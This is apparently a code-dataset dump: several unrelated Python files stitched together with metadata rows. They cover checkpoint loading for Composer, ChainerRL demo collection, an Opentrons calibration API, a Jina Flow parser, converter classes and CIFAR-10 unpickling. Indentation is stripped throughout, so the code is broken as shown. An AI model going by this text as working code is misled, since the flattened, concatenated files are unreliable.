my_model/ep1-rank0.tar
my_model/ep1-rank1.tar
my_model/ep1-rank2.tar
...
Then, ``path`` should be set to ``my_model/ep1-rank{rank}.tar``, and all ranks will load the
correct state.
state (State): The :class:`~composer.core.state.State` to load the checkpoint into.
object_store (Union[ObjectStore, LoggerDestination], optional): If the ``path`` is in an object store
(i.e. AWS S3 or Google Cloud Storage), an instance of
:class:`~.ObjectStore` or :class:`~.LoggerDestination` which will be used
to retreive the checkpoint. Otherwise, if the checkpoint is a local filepath, set to ``None``.
(default: ``None``)
load_weights_only (bool, optional): Whether or not to only restore the model weights from the checkpoint without
restoring the associated state. (default: ``False``)
strict_model_weights (bool, optional): Whether or not to force that the checkpointed weights must exactly
match the model weights. (default: ``False``)
progress_bar (bool, optional): Whether or not to show a progress bar when downloading checkpoints.
Ignored if the checkpoint is a local file path. (default: ``True``)
ignore_keys (List[str] | (Dict) -> None, optional): A list of paths for the ``state_dict`` of the checkpoint,
which, when provided, will be ignored from the state_dict before a checkpoint is loaded. Each path is a list
of strings specifying the keys to index into ``state_dict`` joined together with `/` as a seperator (as PyTorch
uses `.` in parameter names). If a prefix is provided, all children are also ignored (see Example 2).
See :mod:`composer.core.state` for the structure of state_dict.
Example 1: ``ignore_keys = ["state/model/layer1.weights", "state/model/layer1.bias"]`` would ignore
layer 1 weights and bias.
Example 2: ``ignore_keys = ["state/model/*"]`` would ignore the entire model, which would have the same
effect as the previous example if there was only 1 layer.
Example 3: ``ignore_keys = ["state/model/layer*.weights"]`` would ignore all weights in the model.
Example 4: ``ignore_keys = ["state/rank_zero_seed", "rng"]`` would reset all randomness when
loading the checkpoint.
If a callable, it should take one argument which is the state_dict. The callable is free to arbitrarily modify
the state_dict before it is loaded.
(default: ``None``)
Returns:
Optional[List[Dict[str, Any]]]: The RNG state dicts, indexed by global rank, if
:attr:`load_weights_only` is not None. Otherwise, None.
"""
# download the checkpoint to the node-local folder
tempdir_ctx = tempfile.TemporaryDirectory() if dist.get_local_rank() == 0 else contextlib.nullcontext(None)
with tempdir_ctx as tempdir:
try:
node_checkpoint_folder = _get_node_checkpoint_download_folder(tempdir)
composer_states_filepath, extracted_checkpoint_folder, extracted_rank_n = _download_checkpoint(
path=path,
node_checkpoint_folder=node_checkpoint_folder,
object_store=object_store,
progress_bar=progress_bar,
)
rng_state_dicts = _restore_checkpoint(
state,
composer_states_filepath,
extracted_rank_n,
extracted_checkpoint_folder,
load_weights_only=load_weights_only,
strict_model_weights=strict_model_weights,
ignore_keys=ignore_keys,
)
finally:
# Wait for all ranks to finish restoring the checkpoint before releasing the tempdir, since tempdir can
# be a shared resource between nodes.
dist.barrier()
log.info("%s loaded from %s", "Model weights" if load_weights_only else "Trainer checkpoint", path)
return rng_state_dicts
def _get_node_checkpoint_download_folder(path: Optional[str]) -> str:
"""Broadcasts the ``path`` from the LOCAL rank zero to all LOCAL ranks."""
local_rank_zero = dist.get_local_world_size() * dist.get_node_rank()
paths = dist.all_gather_object(path)
local_rank_zero_path = paths[local_rank_zero]
assert local_rank_zero_path is not None, "local rank zero provides the path"
return local_rank_zero_path
def _download_checkpoint(
path: str,
node_checkpoint_folder: str,
object_store: Optional[Union[ObjectStore, LoggerDestination]],
progress_bar: bool,
) -> Tuple[str, Optional[str], bool]:
"""Download the checkpoint stored at ``path``, potentially in ``object_store``, to ``node_checkpoint_folder``.
Returns a tuple of (``composer_states_filepath``, ``extracted_checkpoint_folder``, ``extracted_rank_n``).
* The ``composer_states_filepath``, is the path to the composer states, which can be passed into
:meth:`torch.load`.
* The ``extracted_checkpoint_folder`` is the path to the checkpoint folder, which can be passed into
:meth:`deepspeed.DeepSpeedEngine.load_checkpoint`.
* The ``extracted_rank_n`` is a boolean flag indicating whether a tarball was extracted on global
rank greater than 0.
"""
rank_zero_checkpoint_filepath = os.path.join(node_checkpoint_folder, "rank0_checkpoint")
rank_n_checkpoint_filepath = os.path.join(node_checkpoint_folder, f"rank{dist.get_global_rank()}_checkpoint")
extracted_checkpoint_folder = None
extracted_rank_n = False
if is_tar(path):
extracted_checkpoint_folder = os.path.join(node_checkpoint_folder, "checkpoint")
composer_states_filepath = os.path.join(extracted_checkpoint_folder, _COMPOSER_STATES_FILENAME)
else:
# it's not an archive; it's just the composer state dict
# and only rank zero has this file
extracted_checkpoint_folder = None
composer_states_filepath = rank_zero_checkpoint_filepath
try:
if dist.get_local_rank() == 0:
# every NODE needs the GLOBAL rank zero checkpoint
path = _format_path_with_rank_zero(path)
get_file(destination=rank_zero_checkpoint_filepath,
path=path,
object_store=object_store,
progress_bar=progress_bar)
if extracted_checkpoint_folder is not None:
try:
with tarfile.open(rank_zero_checkpoint_filepath) as tarball:
tarball.extractall(extracted_checkpoint_folder)
except FileNotFoundError:
# Not re-raising the file-not-found error as that is irrelevant;
# the underlying issue is that the checkpoint file does not exist on the disk
# or could not be downloaded
raise RuntimeError(f"Checkpoint {path} does not exist")
if rank_zero_checkpoint_filepath != rank_n_checkpoint_filepath:
# every RANK needs ITS OWN checkpoint.
# But, the global rank zero is a special case -- these files are the same!
assert dist.get_global_rank() != 0, "invariant violation"
try:
get_file(destination=rank_n_checkpoint_filepath,
path=_format_path_with_current_rank(path),
object_store=object_store,
progress_bar=progress_bar)
except FileNotFoundError:
# Allowing not-found errors to be ignored as sometimes there won't be rank-local checkpoints
# (e.g. when not using deepspeed)
pass
if extracted_checkpoint_folder is not None:
try:
# it's an archive and needs to be extracted
with tarfile.open(rank_n_checkpoint_filepath) as tarball:
tarball.extractall(extracted_checkpoint_folder)
extracted_rank_n = True
except FileNotFoundError:
# this will happen most of the time (i.e. whenever deepspeed
# is not being used) so not logging anything
pass
finally:
# Wait for all checkpoints on the node to finish downloading
# Putting the barrier in a finally so the rank will always block on the barrier,
# even if it has an exception.
# Any exception will be re-raised after the barrier passes. The launcher script
# will detect the process crash and terminate the other ranks
dist.barrier()
return composer_states_filepath, extracted_checkpoint_folder, extracted_rank_n
def _flatten_keys(obj: Any, paths: List[str], existing_path: str):
"""Recursively flatten the keys of a dictionary or list into a set of paths."""
# Store path when we reach end, which is either non-Dict or empty Dict
if isinstance(obj, list) and len(obj) > 0:
for i, elm in enumerate(obj):
_flatten_keys(elm, paths, f"{existing_path}/{i}")
elif isinstance(obj, dict) and len(obj) > 0:
for k, v in obj.items():
_flatten_keys(v, paths, f"{existing_path}/{k}")
# Remove leading /
paths.append(existing_path.lstrip('/'))
def _remove_paths(obj: Union[list, Dict[str, Any]], exclude_paths: List[List[str]]):
# First determine the keys which will be recursed on and which will be removed entirely
# Group the `exclude_paths` by the key
keys_to_recurse = {}
keys_to_remove = []
for exclude_path_parts in exclude_paths:
key = exclude_path_parts[0]
if isinstance(obj, list):
key = int(key)
if len(exclude_path_parts) == 1:
keys_to_remove.append(key)
else:
if key not in keys_to_recurse:
keys_to_recurse[key] = []
keys_to_recurse[key].append(exclude_path_parts[1:])
# Recurse first, so in the case of a list, the indexing is consistent
for key, paths_to_recurse in keys_to_recurse.items():
_remove_paths(obj[key], paths_to_recurse)
# Sort the keys in reverse order, so in the case of a list, the indexing is consistent
keys_to_remove.sort(reverse=True)
# Remove the keys
for key in keys_to_remove:
del obj[key]
def glob_filter(exclude_globs: List[str]) -> Callable[[Dict], None]:
"""Provides a function which deletes all subparts of a dictionary based on a list of paths."""
def filter_func(state_dict: Dict) -> None:
# Flatten dictionary into paths
paths = []
_flatten_keys(state_dict, paths, '/')
filtered_paths = []
for exclude_glob in exclude_globs:
filtered_paths_from_glob = fnmatch.filter(paths, exclude_glob)
if len(filtered_paths_from_glob) == 0:
warnings.warn(
f"No parts from loaded checkpoint state_dict were ignored by load_ignore_key {exclude_glob}")
filtered_paths.extend(filtered_paths_from_glob)
filtered_paths = list(set(filtered_paths))
filtered_paths_str = ", ".join(filtered_paths)
if filtered_paths:
log.info(f"Ignoring the following paths from the loaded checkpoint state_dict: {filtered_paths_str}")
# Loop through all paths to exclude
paths_to_remove = [path.split("/") for path in filtered_paths]
_remove_paths(state_dict, paths_to_remove)
return filter_func
def _restore_checkpoint(
state: State,
composer_states_filepath: str,
extracted_rank_n: bool,
extracted_checkpoint_folder: Optional[str],
load_weights_only: bool,
strict_model_weights: bool,
ignore_keys: Optional[Union[List[str], Callable[[Dict], None]]],
) -> Optional[List[Dict[str, Any]]]:
"""Restore a checkpoint into ``state`` and returns the rng state dicts (if ``load_weights_only`` is False)."""
# Now, all ranks load the checkpoint that local rank zero downloaded
state_dict = torch.load(composer_states_filepath, map_location='cpu')
if ignore_keys:
# Filter provided list of key paths
if not callable(ignore_keys):
ignore_keys = glob_filter(ignore_keys)
# Call function to modify state_dict
ignore_keys(state_dict)
log.debug(f"Loaded checkpoint with keys {state_dict.keys()} and state keys {state_dict['state'].keys()}")
if state.is_model_deepspeed:
if extracted_checkpoint_folder is None:
raise RuntimeError("Deepspeed checkpoints require a tarball, not a weights file.")
global_rank = dist.get_global_rank()
if global_rank > 0 and not extracted_rank_n:
raise RuntimeError(f"Deepspeed checkpoint missing for rank {global_rank}")
load_path, _ = state.deepspeed_model.load_checkpoint(
extracted_checkpoint_folder,
tag=_DEEPSPEED_TAG,
load_module_only=load_weights_only,
load_module_strict=strict_model_weights,
)
if load_path is None:
raise RuntimeError(f"Failed to load DeepSpeed checkpoint")
elif load_weights_only:
state.load_model_state(state_dict['state'], strict=strict_model_weights)
if not load_weights_only:
state.load_state_dict(state_dict['state'])
return state_dict['rng']
def save_checkpoint(
state: State,
filename: str = "ep{epoch}-ba{batch}-rank{rank}",
*,
weights_only: bool = False,
) -> List[pathlib.Path]: # noqa: D103
state_dict = {
'state': state.state_dict(),
'rng': reproducibility.get_rng_state(),
}
if weights_only and not state.is_model_deepspeed:
state_dict['state'] = {"model": state_dict['state']['model']}
checkpoint_filepath = format_name_with_dist_and_time(filename, state.run_name, state.timestamp)
if state.is_model_deepspeed and not is_tar(checkpoint_filepath):
# Deepspeed requires tarballs; appending `.tar`
checkpoint_filepath += ".tar"
with tempfile.TemporaryDirectory() as tmpdir:
composer_states_filepath = os.path.join(tmpdir, _COMPOSER_STATES_FILENAME)
if dist.get_global_rank() == 0:
# Only rank zero saves the composer state dict
with open(composer_states_filepath, 'xb') as f:
torch.save(state_dict, f)
if state.is_model_deepspeed:
state.deepspeed_model.save_checkpoint(tmpdir, _DEEPSPEED_TAG)
# Move the checkpoint to the correct location
checkpoint_dirname = os.path.dirname(checkpoint_filepath)
if is_tar(checkpoint_filepath) and (state.is_model_deepspeed or dist.get_global_rank() == 0):
# Either deepspeed (and every rank needs to call this),
# or not deepspeed (but using an archive), in which case only rank zero should call this.
if checkpoint_dirname:
os.makedirs(checkpoint_dirname, exist_ok=True)
write_mode = _get_write_mode(checkpoint_filepath)
with tarfile.open(checkpoint_filepath, write_mode) as tarball:
# add files flat to the tarball with the specified compression
tarball.add(tmpdir, arcname="")
elif dist.get_global_rank() == 0:
# if not an archive, then only saving the states
# only rank zero saves the state dict
if checkpoint_dirname:
os.makedirs(checkpoint_dirname, exist_ok=True)
shutil.move(composer_states_filepath, checkpoint_filepath)
else:
checkpoint_filepath = None
# Ensure that all processes wait for the checkpoint to be saved.
dist.barrier()
if checkpoint_filepath is not None:
log.info('Saved checkpoint at %s', checkpoint_filepath)
# Gather the paths across ranks.
paths = dist.all_gather_object(checkpoint_filepath)
paths = list(pathlib.Path(path) for path in paths if path is not None)
return paths
save_checkpoint.__doc__ = f"""Checkpoint the training ``state``.
Args:
state (State): The training state.
logger (Logger): The logger.
filename (str): A format string describing how to name checkpoints.
(default: ``'ep{{epoch}}-ba{{batch}}-rank{{rank}}'``)
The following format variables are available:
{textwrap.indent(FORMAT_NAME_WITH_DIST_AND_TIME_TABLE, prefix=' ')}
.. note::
* By default, only the rank zero process will save a checkpoint file.
* When using DeepSpeed, each rank will save a checkpoint file in tarball format. DeepSpeed
requires tarball format, as it saves model and optimizer states in separate files.
Ensure that ``'{{rank}}'`` appears within the ``filename``. Otherwise, multiple ranks
may attempt to write to the same file(s), leading to corrupted checkpoints. If no tarball file
extension is specified, ``.tar`` will be used.
* To use compression (regardless of whether DeepSpeed is enabled), set the file extension
to ``'.tar.gz'``, ``'.tgz'``, ``'.tar.bzip'``, or ``'.tar.lzma'`` (depending on the desired
compression algorithm).
.. warning::
Using compression will block the training loop while checkpoints are being compressed. As such, we
recommend saving checkpoints without compression.
Consider the following scenario, where:
* The default ``name='ep{{epoch}}-ba{{batch}}-rank{{rank}}'`` is used.
* The current epoch count is ``1``.
* The current batch count is ``42``.
When DeepSpeed is not being used, the rank zero process will save the checkpoint to ``'ep1-ba42-rank0'``.
When DeepSpeed is being used, each rank (process) will save checkpoints to::
ep1-ba42-rank0.tar
ep1-ba42-rank1.tar
ep1-ba42-rank2.tar
...
weights_only (bool, optional): If ``True``, save only the model weights instead of the entire training state.
(default: ``False``)
.. note::
When using DeepSpeed, this parameter must be ``False``. Weights-only checkpointing is not currently
compatible with DeepSpeed,
Returns:
List[pathlib.Path]: The list of checkpoint files saved, indexed by the rank of the process.
.. note::
When using DeepSpeed, each process (rank) saves its own checkpoint file.
When doing multi-node training, the filepaths are valid only on each process's node;
Composer does not move checkpoint files between nodes.
Otherwise, when not using DeepSpeed, each list will contain only one filepath,
since only the rank zero process saves checkpoints.
"""
| 44.744186
| 127
| 0.635005
|
4a0f3500d6451c3e1d2032ed67ccd67497bdc331
| 4,354
|
py
|
Python
|
examples/atari/collect_demos_ale.py
|
pratyushpal/chainerrl
|
fec001305e9b552ba9c69be01aa92b774dbc69c4
|
[
"MIT"
] | 1
|
2019-08-19T15:23:54.000Z
|
2019-08-19T15:23:54.000Z
|
examples/atari/collect_demos_ale.py
|
pratyushpal/chainerrl
|
fec001305e9b552ba9c69be01aa92b774dbc69c4
|
[
"MIT"
] | null | null | null |
examples/atari/collect_demos_ale.py
|
pratyushpal/chainerrl
|
fec001305e9b552ba9c69be01aa92b774dbc69c4
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
from __future__ import absolute_import
from builtins import * # NOQA
from future import standard_library
standard_library.install_aliases() # NOQA
import argparse
import os
from chainer import links as L
from chainer import optimizers
import gym
import gym.wrappers
import numpy as np
import chainerrl
from chainerrl.action_value import DiscreteActionValue
from chainerrl import agents
from chainerrl import experiments
from chainerrl import links
from chainerrl import misc
from chainerrl import replay_buffer
from chainerrl.wrappers import atari_wrappers
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--env', type=str, default='BreakoutNoFrameskip-v4',
help='OpenAI Atari domain to perform algorithm on.')
parser.add_argument('--outdir', type=str, default='results',
help='Directory path to save output files.'
' If it does not exist, it will be created.')
parser.add_argument('--seed', type=int, default=0,
help='Random seed [0, 2 ** 31)')
parser.add_argument('--gpu', type=int, default=0,
help='GPU to use, set to -1 if no GPU.')
parser.add_argument('--load', type=str, default=None, required=True)
parser.add_argument('--logging-level', type=int, default=20,
help='Logging level. 10:DEBUG, 20:INFO etc.')
parser.add_argument('--render', action='store_true', default=False,
help='Render env states in a GUI window.')
parser.add_argument('--monitor', action='store_true', default=False,
help='Monitor env. Videos and additional information'
' are saved as output files.')
parser.add_argument('--steps', type=int, default=5 * 10 ** 7,
help='Total number of demo timesteps to collect')
args = parser.parse_args()
import logging
logging.basicConfig(level=args.logging_level)
# Set a random seed used in ChainerRL.
misc.set_random_seed(args.seed, gpus=(args.gpu,))
args.outdir = experiments.prepare_output_dir(args, args.outdir)
print('Output files are saved in {}'.format(args.outdir))
def make_env():
env = atari_wrappers.wrap_deepmind(
atari_wrappers.make_atari(args.env, max_frames=None),
episode_life=False,
clip_rewards=False)
env.seed(int(args.seed))
# Randomize actions like epsilon-greedy
env = chainerrl.wrappers.RandomizeAction(env, 0.01)
if args.monitor:
env = gym.wrappers.Monitor(
env, args.outdir,
mode='evaluation')
if args.render:
env = chainerrl.wrappers.Render(env)
return env
env = make_env()
n_actions = env.action_space.n
q_func = links.Sequence(
links.NatureDQNHead(),
L.Linear(512, n_actions),
DiscreteActionValue)
# Draw the computational graph and save it in the output directory.
chainerrl.misc.draw_computational_graph(
[q_func(np.zeros((4, 84, 84), dtype=np.float32)[None])],
os.path.join(args.outdir, 'model'))
# The optimizer and replay buffer are dummy variables required by agent
opt = optimizers.RMSpropGraves()
opt.setup(q_func)
rbuf = replay_buffer.ReplayBuffer(1)
def phi(x):
# Feature extractor
return np.asarray(x, dtype=np.float32) / 255
Agent = agents.DQN
agent = Agent(q_func, opt, rbuf, gpu=args.gpu, gamma=0.99,
explorer=None, replay_start_size=1,
minibatch_size=1,
target_update_interval=None,
clip_delta=True,
update_interval=4,
phi=phi)
agent.load(args.load)
# saves demos to outdir/demos.pickle
experiments.collect_demonstrations(agent=agent,
env=env,
steps=args.steps,
episodes=None,
outdir=args.outdir,
max_episode_len=None)
if __name__ == '__main__':
main()
| 36.283333
| 77
| 0.618282
|
4a0f35631dd37618e8a2d68a6b1828b8b5484692
| 3,633
|
py
|
Python
|
robot-server/robot_server/service/legacy/routers/deck_calibration.py
|
fakela/opentrons
|
676f1296a515fd5db15777e732bc77cf74364ac4
|
[
"Apache-2.0"
] | null | null | null |
robot-server/robot_server/service/legacy/routers/deck_calibration.py
|
fakela/opentrons
|
676f1296a515fd5db15777e732bc77cf74364ac4
|
[
"Apache-2.0"
] | null | null | null |
robot-server/robot_server/service/legacy/routers/deck_calibration.py
|
fakela/opentrons
|
676f1296a515fd5db15777e732bc77cf74364ac4
|
[
"Apache-2.0"
] | null | null | null |
from uuid import UUID
from opentrons.config import robot_configs
from starlette import status
from fastapi import APIRouter, Depends
from opentrons.hardware_control import ThreadManager
import opentrons.deck_calibration.endpoints as dc
from robot_server.service.dependencies import get_hardware
from robot_server.service.errors import V1HandlerError
from robot_server.service.legacy.models import V1BasicResponse
from robot_server.service.legacy.models.deck_calibration import DeckStart, \
DeckStartResponse, DeckCalibrationDispatch, PipetteDeckCalibration, \
CalibrationStatus, DeckCalibrationStatus
router = APIRouter()
@router.post("/calibration/deck/start",
description="Begin (or restart) a deck calibration session",
responses={
status.HTTP_403_FORBIDDEN: {"model": V1BasicResponse},
status.HTTP_409_CONFLICT: {"model": V1BasicResponse}
},
response_model=DeckStartResponse,
status_code=status.HTTP_201_CREATED)
async def post_calibration_deck_start(
command: DeckStart = DeckStart(),
hardware: ThreadManager = Depends(get_hardware)) \
-> DeckStartResponse:
try:
res = await dc.create_session(command.force, hardware)
return DeckStartResponse(token=UUID(res.token),
pipette=PipetteDeckCalibration(**res.pipette))
except dc.SessionForbidden as e:
raise V1HandlerError(status_code=status.HTTP_403_FORBIDDEN,
message=str(e))
except dc.SessionInProgress as e:
raise V1HandlerError(status_code=status.HTTP_409_CONFLICT,
message=str(e))
@router.post("/calibration/deck",
description="Execute a deck calibration action",
response_model=V1BasicResponse,
responses={
418: {"model": V1BasicResponse},
status.HTTP_403_FORBIDDEN: {"model": V1BasicResponse},
status.HTTP_400_BAD_REQUEST: {"model": V1BasicResponse},
})
async def post_calibration_deck(operation: DeckCalibrationDispatch) \
-> V1BasicResponse:
try:
res = await dc.dispatch(
token=str(operation.token),
command=operation.command,
command_data=operation.dict(exclude={'token', 'command'},
exclude_none=True))
if not res.success:
raise AssertionError(res.message)
return V1BasicResponse(message=res.message)
except dc.NoSessionInProgress as e:
message = str(e)
status_code = 418
except dc.SessionForbidden as e:
message = str(e)
status_code = status.HTTP_403_FORBIDDEN
except AssertionError as e:
message = str(e)
status_code = status.HTTP_400_BAD_REQUEST
except Exception as e:
message = f'Exception {type(e)} raised by dispatch of {operation}: {e}'
status_code = status.HTTP_500_INTERNAL_SERVER_ERROR
raise V1HandlerError(status_code=status_code, message=message)
@router.get("/calibration/status",
description="Get the calibration status",
response_model=CalibrationStatus)
async def get_calibration_status(
hardware: ThreadManager = Depends(get_hardware)) -> CalibrationStatus:
robot_conf = robot_configs.load()
return CalibrationStatus(
deckCalibration=DeckCalibrationStatus(
status=hardware.validate_calibration(),
data=robot_conf.gantry_calibration),
instrumentCalibration=robot_conf.instrument_offset)
| 39.923077
| 79
| 0.676301
|
4a0f370e6b97448be4b7d1b8a1f1ede21c38228e
| 314
|
py
|
Python
|
[Kaleido-subs]/Completed/Higurashi no Naku Koro ni [BD]/ac_Higurashi1BD_20.py
|
tuilakhanh/Encoding-Projects
|
8b254913457cb28e7d0890ad6b974d0d8f0cbecc
|
[
"MIT"
] | 57
|
2019-01-31T17:32:46.000Z
|
2022-03-23T05:46:51.000Z
|
[Kaleido-subs]/Completed/Higurashi no Naku Koro ni [BD]/ac_Higurashi1BD_20.py
|
tuilakhanh/Encoding-Projects
|
8b254913457cb28e7d0890ad6b974d0d8f0cbecc
|
[
"MIT"
] | null | null | null |
[Kaleido-subs]/Completed/Higurashi no Naku Koro ni [BD]/ac_Higurashi1BD_20.py
|
tuilakhanh/Encoding-Projects
|
8b254913457cb28e7d0890ad6b974d0d8f0cbecc
|
[
"MIT"
] | 12
|
2019-04-30T06:16:13.000Z
|
2022-03-14T16:15:07.000Z
|
#!/usr/bin/env python3
import vapoursynth as vs
import acsuite
import lvsfunc as lvf
ac = acsuite.AC()
core = vs.core
path = r'BDMV/HIGURASHI_BD/00021.m2ts'
src = lvf.src(path)
src = core.vivtc.VDecimate(src)
if __name__ == "__main__":
ac.eztrim(src, [(0, -24)], path[:-4]+"wav", "Higurashi1BD_20_cut.wav")
| 20.933333
| 74
| 0.694268
|
4a0f38b9f7e6a6b2eaeab23afa7e8fcdef99c1ec
| 5,445
|
py
|
Python
|
sourdough/project/converters.py
|
WithPrecedent/sourdough
|
52d99ca056cda93fb3e913fbca3d9a5947ec3513
|
[
"Apache-2.0"
] | null | null | null |
sourdough/project/converters.py
|
WithPrecedent/sourdough
|
52d99ca056cda93fb3e913fbca3d9a5947ec3513
|
[
"Apache-2.0"
] | null | null | null |
sourdough/project/converters.py
|
WithPrecedent/sourdough
|
52d99ca056cda93fb3e913fbca3d9a5947ec3513
|
[
"Apache-2.0"
] | null | null | null |
"""
converters: type converters specific to the project subpackage
Corey Rayburn Yung <coreyrayburnyung@gmail.com>
Copyright 2020-2021, Corey Rayburn Yung
License: Apache-2.0 (https://www.apache.org/licenses/LICENSE-2.0)
Contents:
"""
from __future__ import annotations
import dataclasses
import pathlib
from typing import (Any, Callable, ClassVar, Dict, Iterable, List, Mapping,
Optional, Sequence, Tuple, Type, Union, get_args,
get_origin)
import sourdough
@dataclasses.dataclass
class SettingsConverter(sourdough.Converter):
"""Type converter for Settings.
Args:
base (str):
parameters (Dict[str, Any]):
alternatives (Tuple[Type])
"""
base: str = 'settings'
parameters: Dict[str, Any] = dataclasses.field(default_factory = dict)
alternatives: Tuple[Type] = tuple([pathlib.Path, Mapping])
@dataclasses.dataclass
class FilerConverter(sourdough.Converter):
"""Type Converter for Filer
Args:
base (str):
parameters (Dict[str, Any]):
alternatives (Tuple[Type])
"""
base: str = 'filer'
parameters: Dict[str, Any] = dataclasses.field(
default_factory = lambda: {'settings': 'settings'})
alternatives: Tuple[Type] = tuple([pathlib.Path, Mapping])
@dataclasses.dataclass
class WorkerConverter(sourdough.Converter):
"""Type converter for Worker
Args:
base (str):
parameters (Dict[str, Any]):
alternatives (Tuple[Type])
"""
base: str = 'component'
parameters: Dict[str, Any] = dataclasses.field(
default_factory = lambda: {'project': 'self'})
alternatives: Tuple[Type] = None
@dataclasses.dataclass
class WorkersConverter(sourdough.Converter):
"""Type converter for Workers.
Args:
base (str):
parameters (Dict[str, Any]):
alternatives (Tuple[Type])
"""
base: str = 'component'
parameters: Dict[str, Any] = dataclasses.field(
default_factory = lambda: {'project': 'self'})
alternatives: Tuple[Type] = None
def validate(self, item: Any, instance: object) -> object:
"""[summary]
Args:
workers (Sequence[Union[ base.Worker,
Type[base.Worker], str]]): [description]
Returns:
Sequence[base.Worker]: [description]
"""
if not item:
try:
item = instance.settings[instance.name][
f'{instance.name}_workers']
except KeyError:
pass
new_workers = []
for worker in item:
converter = instance.initialize_converter(
name = 'worker',
converter = 'worker')
new_workers.append(converter.validate(
item = [worker, 'worker'],
instance = instance))
return new_workers
@dataclasses.dataclass
class CreatorConverter(sourdough.Converter):
"""Type converter for Creator.
Args:
base (str):
parameters (Dict[str, Any]):
alternatives (Tuple[Type])
"""
base: str = 'creator'
parameters: Dict[str, Any] = dataclasses.field(default_factory = dict)
alternatives: Tuple[Type] = None
@dataclasses.dataclass
class CreatorsConverter(sourdough.Converter):
"""Type converter for Creators.
Args:
base (str):
parameters (Dict[str, Any]):
alternatives (Tuple[Type])
"""
base: str = 'creator'
parameters: Dict[str, Any] = dataclasses.field(default_factory = dict)
alternatives: Tuple[Type] = None
def validate(self, item: Any, instance: object) -> object:
"""
"""
new_creators = []
for creator in item:
converter = instance.initialize_converter(
name = 'creator',
converter = 'creator')
new_creators.append(converter.validate(
item = [creator, 'worker'],
instance = instance))
return new_creators
@dataclasses.dataclass
class ComponentConverter(sourdough.Converter):
"""Type converter for Component.
Args:
base (str):
parameters (Dict[str, Any]):
alternatives (Tuple[Type])
"""
base: str = 'component'
parameters: Dict[str, Any] = dataclasses.field(
default_factory = lambda: {'name': 'str'})
alternatives: Tuple[Type] = None
@dataclasses.dataclass
class WorkflowConverter(sourdough.Converter):
"""Type converter for Workflow
Args:
base (str):
parameters (Dict[str, Any]):
alternatives (Tuple[Type])
"""
base: str = 'workflow'
parameters: Dict[str, Any] = dataclasses.field(default_factory = dict)
alternatives: Tuple[Type] = None
@dataclasses.dataclass
class ResultsConverter(sourdough.Converter):
"""Type converter for Results.
Args:
base (str):
parameters (Dict[str, Any]):
alternatives (Tuple[Type])
"""
base: str = 'results'
parameters: Dict[str, Any] = dataclasses.field(
default_factory = lambda: {'name': 'name',
'identification': 'identification'})
alternatives: Tuple[Type] = None
| 26.82266
| 76
| 0.583655
|
4a0f392d5da81f6fc506db611d28ee6f4881758f
| 2,491
|
py
|
Python
|
jina/jaml/parsers/flow/legacy.py
|
HarshCasper/jina
|
81ab098b140b74ad1cfdfde9218cec7a40923749
|
[
"Apache-2.0"
] | 1
|
2021-02-25T19:28:50.000Z
|
2021-02-25T19:28:50.000Z
|
jina/jaml/parsers/flow/legacy.py
|
HarshCasper/jina
|
81ab098b140b74ad1cfdfde9218cec7a40923749
|
[
"Apache-2.0"
] | 1
|
2021-02-27T05:56:45.000Z
|
2021-02-27T05:57:03.000Z
|
jina/jaml/parsers/flow/legacy.py
|
deepampatel/jina
|
97f9e97a4a678a28bdeacbc7346eaf7bbd2aeb89
|
[
"Apache-2.0"
] | null | null | null |
from typing import Dict, Any, Type
from ..base import VersionedYAMLParser
from ....enums import PodRoleType
from ....flow.base import BaseFlow
from ....helper import expand_env_var, ArgNamespace
from ....parsers import set_gateway_parser, set_pod_parser
class LegacyParser(VersionedYAMLParser):
version = 'legacy' # the version number this parser designed for
def parse(self, cls: Type['BaseFlow'], data: Dict) -> 'BaseFlow':
"""
:param cls: target class type to parse into, must be a :class:`JAMLCompatible` type
:param data: flow yaml file loaded as python dict
:return: the Flow YAML parser given the syntax version number
"""
p = data.get('with', {}) # type: Dict[str, Any]
a = p.pop('args') if 'args' in p else ()
k = p.pop('kwargs') if 'kwargs' in p else {}
# maybe there are some hanging kwargs in "parameters"
tmp_a = (expand_env_var(v) for v in a)
tmp_p = {kk: expand_env_var(vv) for kk, vv in {**k, **p}.items()}
obj = cls(*tmp_a, **tmp_p)
pp = data.get('pods', {})
for pod_name, pod_attr in pp.items():
p_pod_attr = {kk: expand_env_var(vv) for kk, vv in pod_attr.items()}
if pod_name != 'gateway':
# ignore gateway when reading, it will be added during build()
obj.add(name=pod_name, **p_pod_attr, copy_flow=False)
return obj
def dump(self, data: 'BaseFlow') -> Dict:
"""
:param data: versioned flow object
:return: the dictionary given a versioned flow object
"""
r = {}
if data._version:
r['version'] = data._version
if data._kwargs:
r['with'] = data._kwargs
if data._pod_nodes:
r['pods'] = {}
if 'gateway' in data._pod_nodes:
# always dump gateway as the first pod, if exist
r['pods']['gateway'] = {}
for k, v in data._pod_nodes.items():
if k == 'gateway':
continue
kwargs = {'needs': list(v.needs)} if v.needs else {}
parser = set_pod_parser()
if v.role == PodRoleType.GATEWAY:
parser = set_gateway_parser()
non_default_kw = ArgNamespace.get_non_defaults_args(v.args, parser)
kwargs.update(non_default_kw)
if 'name' in kwargs:
kwargs.pop('name')
r['pods'][k] = kwargs
return r
| 33.662162
| 91
| 0.571658
|
4a0f3a2dfc5fa5124278f15de09106c4d17e915e
| 2,395
|
py
|
Python
|
Classification/bins/parse_cifar_to_png.py
|
ttthomaschan/DeepcvLib
|
18f7728559136a3c5c8ad54666788ea771e95b16
|
[
"MIT"
] | null | null | null |
Classification/bins/parse_cifar_to_png.py
|
ttthomaschan/DeepcvLib
|
18f7728559136a3c5c8ad54666788ea771e95b16
|
[
"MIT"
] | null | null | null |
Classification/bins/parse_cifar_to_png.py
|
ttthomaschan/DeepcvLib
|
18f7728559136a3c5c8ad54666788ea771e95b16
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
# @file name : parse_cifar10_to_png.py
# @author : Junlin Chen
# @date : 2021-06
# @brief : 将cifar10数据pickle形式解析成png格式
"""
import numpy as np
import os
import sys
import pickle
from imageio import imwrite
def unpickle(file):
fo = open(file, 'rb')
if sys.version_info < (3, 0):
dict_ = pickle.load(fo)
else:
dict_ = pickle.load(fo, encoding='bytes')
fo.close()
return dict_
def my_mkdir(my_dir):
if not os.path.isdir(my_dir):
os.makedirs(my_dir)
def pasre_pickle_img(pkl_data):
img = np.reshape(pkl_data[b'data'][i], (3, 32, 32))
label_n = str(pkl_data[b'labels'][i])
img = img.transpose((1, 2, 0)) # c*h*w --> h*w*c
